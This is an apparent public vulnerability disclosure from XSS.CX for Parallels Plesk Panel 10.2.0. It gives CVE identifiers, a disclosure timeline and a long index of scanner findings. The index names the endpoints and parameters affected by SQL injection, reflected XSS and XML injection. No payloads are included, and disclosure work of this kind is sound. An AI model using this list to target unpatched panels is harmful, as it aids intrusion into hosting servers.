CVE-2011-4725, CVE-2011-4726, CVE-2011-4727, CVE-2011-4728, CVE-2011-4729, CVE-2011-4730, CVE-2011-4731, CVE-2011-4732, CVE-2011-4733, Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6, Burp Suite Pro 1.4.1

XSS, SQL Injection and more.. Interim Report via Burp | Reminder to Burp your Site daily!

Report generated by Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6 at Sat Sep 24 17:03:36 CDT 2011.

XSS.CX Summary

Parallels Plesk Control Panel Version 20110407.20 for Windows and RHEL6 Linux Versions are vulnerable to XSS and other injection vulnerabilities beginning with a user of least-privs when logged into the Control Panel. Various exploit are possible from XSS to DoS. This report is specific to proving CWE-79, XSS as a user of least authentication within the Control Panel Application. Initially reported (privately) to Plesk in October 2010 in Parallels Ticket #1020740, these vulnerabilities, and others, still exist in the current releases of the Control Panel Products. Further reported to CERT in April 2011 with Ticket VU#541814. No contact received after June 1, 2011. Published September 21,2011 on XSS.CX.

Interim Report via Acunetix 7, Interim Report via Paros Desktop, RHEL6 Target Analysis for CPanel Report for Windows Server

Assigned CVE Identifiers on 12-10-2011: CVE-2011-4725, CVE-2011-4726, CVE-2011-4727, CVE-2011-4728, CVE-2011-4729, CVE-2011-4730, CVE-2011-4731, CVE-2011-4732, CVE-2011-4733

Loading

1. SQL injection

1.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/ [locale cookie]

1.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create [contactInfoSection%5BcontactInfo%5D%5Bfax%5D parameter]

1.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list [searchFilter[resourceUsage][searchText] parameter]

1.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/ [Referer HTTP header]

1.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller [User-Agent HTTP header]

1.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/ [psaContext cookie]

1.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list [REST URL parameter 2]

1.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 [locale cookie]

1.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 [name of an arbitrarily supplied request parameter]

2. Cross-site scripting (reflected)

2.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ [start_page parameter]

2.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage-data [searchFilter%5Bname%5D%5BsearchText%5D parameter]

2.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/ [group parameter]

2.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/ [email parameter]

2.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/custom-buttons/custom-button@new/properties/ [wizard parameter]

2.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/ [wizard parameter]

3. XML injection

3.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/ [REST URL parameter 1]

3.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/create [REST URL parameter 1]

3.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list [REST URL parameter 1]

3.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create [REST URL parameter 1]

3.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list [REST URL parameter 1]

3.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list/reset-search/true/ [REST URL parameter 1]

3.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/domain/list [REST URL parameter 1]

3.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/ [REST URL parameter 1]

3.9. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/health/parameters/group/Services [REST URL parameter 1]

3.10. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home [REST URL parameter 1]

3.11. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin%27 [REST URL parameter 1]

3.12. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller [REST URL parameter 1]

3.13. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list [REST URL parameter 1]

3.14. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/ [REST URL parameter 1]

3.15. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/ [REST URL parameter 1]

3.16. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/ [REST URL parameter 1]

3.17. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/scripts/admin-panel.js [REST URL parameter 1]

3.18. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings [REST URL parameter 1]

3.19. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/tools [REST URL parameter 1]

3.20. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/create [REST URL parameter 1]

3.21. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list [REST URL parameter 1]

3.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/true/ [REST URL parameter 1]

3.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/login [REST URL parameter 1]

3.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/favicon.ico [REST URL parameter 1]

3.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/get_password.php [REST URL parameter 1]

3.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php [REST URL parameter 1]

3.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/chk.js.php [REST URL parameter 2]

3.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/common.js [REST URL parameter 1]

3.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/common.js [REST URL parameter 2]

3.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/frameset.js [REST URL parameter 1]

3.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/frameset.js [REST URL parameter 2]

3.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/jsw.js [REST URL parameter 1]

3.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/jsw.js [REST URL parameter 2]

3.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/leftframe.js [REST URL parameter 1]

3.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/leftframe.js [REST URL parameter 2]

3.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.js [REST URL parameter 1]

3.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.js [REST URL parameter 2]

3.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.leIE7.fixes.js [REST URL parameter 1]

3.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/main.leIE7.fixes.js [REST URL parameter 2]

3.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/tooltip.js [REST URL parameter 1]

3.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/tooltip.js [REST URL parameter 2]

3.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/widget.js [REST URL parameter 1]

3.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/javascript/widget.js [REST URL parameter 2]

3.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 [REST URL parameter 1]

3.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3 [REST URL parameter 1]

3.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login.php3 [REST URL parameter 1]

3.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 [REST URL parameter 1]

3.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/logout.php3 [REST URL parameter 1]

3.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/ [REST URL parameter 1]

3.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/ [REST URL parameter 1]

3.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/preferences [REST URL parameter 1]

3.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/ [REST URL parameter 1]

3.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/properties/ [REST URL parameter 1]

3.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default [REST URL parameter 1]

3.55. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default [REST URL parameter 2]

3.56. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 1]

3.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 2]

3.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 3]

3.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 4]

3.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/custom.css [REST URL parameter 5]

3.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 1]

3.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 2]

3.63. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 3]

3.64. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 4]

3.65. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/admin/main.css [REST URL parameter 5]

3.66. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 1]

3.67. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 2]

3.68. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 3]

3.69. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 4]

3.70. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/base.css [REST URL parameter 5]

3.71. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 1]

3.72. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 2]

3.73. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 3]

3.74. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 4]

3.75. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/btns.css [REST URL parameter 5]

3.76. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 1]

3.77. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 2]

3.78. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 3]

3.79. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 4]

3.80. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/double-list-selector.css [REST URL parameter 5]

3.81. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 1]

3.82. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 2]

3.83. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 3]

3.84. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 4]

3.85. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/common/ie.css [REST URL parameter 5]

3.86. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 1]

3.87. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 2]

3.88. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 3]

3.89. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 4]

3.90. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/content-only.css [REST URL parameter 5]

3.91. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 1]

3.92. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 2]

3.93. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 3]

3.94. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 4]

3.95. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/custom.css [REST URL parameter 5]

3.96. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 1]

3.97. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 2]

3.98. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 3]

3.99. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 4]

3.100. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/css/customer/main.css [REST URL parameter 5]

3.101. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 1]

3.102. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 2]

3.103. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 3]

3.104. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 4]

3.105. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/general.css [REST URL parameter 5]

3.106. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 1]

3.107. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 2]

3.108. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 3]

3.109. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 4]

3.110. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/ie.css [REST URL parameter 5]

3.111. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 1]

3.112. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 2]

3.113. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 3]

3.114. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 4]

3.115. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 5]

3.116. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/custom.css [REST URL parameter 6]

3.117. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 1]

3.118. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 2]

3.119. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 3]

3.120. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 4]

3.121. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 5]

3.122. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/left/layout.css [REST URL parameter 6]

3.123. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 1]

3.124. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 2]

3.125. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 3]

3.126. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 4]

3.127. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 5]

3.128. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/apps-control.css [REST URL parameter 6]

3.129. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 1]

3.130. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 2]

3.131. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 3]

3.132. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 4]

3.133. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 5]

3.134. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/buttons.css [REST URL parameter 6]

3.135. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 1]

3.136. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 2]

3.137. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 3]

3.138. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 4]

3.139. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 5]

3.140. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/custom.css [REST URL parameter 6]

3.141. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 1]

3.142. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 2]

3.143. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 3]

3.144. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 4]

3.145. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 5]

3.146. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/desktop.css [REST URL parameter 6]

3.147. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 1]

3.148. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 2]

3.149. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 3]

3.150. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 4]

3.151. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 5]

3.152. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/double-list-control.css [REST URL parameter 6]

3.153. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 1]

3.154. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 2]

3.155. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 3]

3.156. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 4]

3.157. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 5]

3.158. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 6]

3.159. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 1]

3.160. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 2]

3.161. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 3]

3.162. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 4]

3.163. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 5]

3.164. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 6]

3.165. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 1]

3.166. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 2]

3.167. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 3]

3.168. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 4]

3.169. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 5]

3.170. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 6]

3.171. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 1]

3.172. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 2]

3.173. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 3]

3.174. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 4]

3.175. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 5]

3.176. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 6]

3.177. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/ [REST URL parameter 1]

3.178. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription [REST URL parameter 1]

